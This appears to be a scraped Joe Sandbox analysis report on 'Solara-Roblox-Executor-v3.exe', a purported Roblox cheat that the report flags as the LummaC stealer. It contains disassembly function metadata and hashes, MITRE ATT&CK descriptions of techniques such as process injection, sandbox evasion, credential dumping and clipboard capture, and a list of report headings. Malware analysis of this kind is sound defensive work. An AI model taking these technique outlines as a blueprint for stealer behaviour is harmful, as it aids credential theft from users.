Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +Ku$rs$s_,Y
API String ID: 237503144-3023911729
Opcode ID: 132a4129497f545aff3889e5f01bf61e83d8f95caceac5cccf99d046e2a7fa37
Instruction ID: b2387704808af85701359b9831b06c535449624ba98026c49304e44a79d6b797
Opcode Fuzzy Hash: 132a4129497f545aff3889e5f01bf61e83d8f95caceac5cccf99d046e2a7fa37
Instruction Fuzzy Hash: 1A3136726083254FC314CE64DC8278BBBE0EB81708F05892CE4D9DB385D7B8D9068BC6

Function 0043194F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431959
VariantInit.OLEAUT32 ref: 0043196C

Strings

1, xrefs: 004319EB
&, xrefs: 004319F5

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Variant$ClearInit
String ID: &$1
API String ID: 2610073882-1672938204
Opcode ID: 055ad1bcf911e6b22abc2e7994d6cb6182d07d9b6d15b136c6b3d11df41792ab
Instruction ID: 97c73bdc7c0cbf9f901ddca20a57c4532b9f677b322e8ab6f4c4f59f015b5d73
Opcode Fuzzy Hash: 055ad1bcf911e6b22abc2e7994d6cb6182d07d9b6d15b136c6b3d11df41792ab
Instruction Fuzzy Hash: 4141047110C7C28AC326DB7C848869EFFD16BA6324F084A9CE4E58B3E2D7B59445C767

Function 004290B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004290E4

Strings

"#`, xrefs: 00429105
"#`, xrefs: 004290B3

Memory Dump Source

Source File: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: "#`$"#`
API String ID: 237503144-2918922839
Opcode ID: 4bedf46d67d3f14070650c097a6e773abcf144a338bde8666c293731b7166661
Instruction ID: 422267ae647eaa6997567527cdb8426c66d61bb1c8d3a678754d8760bac322e0
Opcode Fuzzy Hash: 4bedf46d67d3f14070650c097a6e773abcf144a338bde8666c293731b7166661
Instruction Fuzzy Hash: 92F0F6313883615FE715CF50ACA2F5FB7A2FBC2704F02843DE9419B1C6C6A4A00AC796

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Solara-Roblox-Executor-v3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
Solara-Roblox-Executor-v3.exe

Function 0032019E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 002F1C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Function 00306642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 002F20C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Function 00306E2A Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Function 002F1DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Function 002FF293 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 0030D3A4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 003072A8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 0030DB7D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00307192 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 002F2010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 003064F3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 003056B7 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 002F14C0 Relevance: 1.8, APIs: 1, Instructions: 308
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre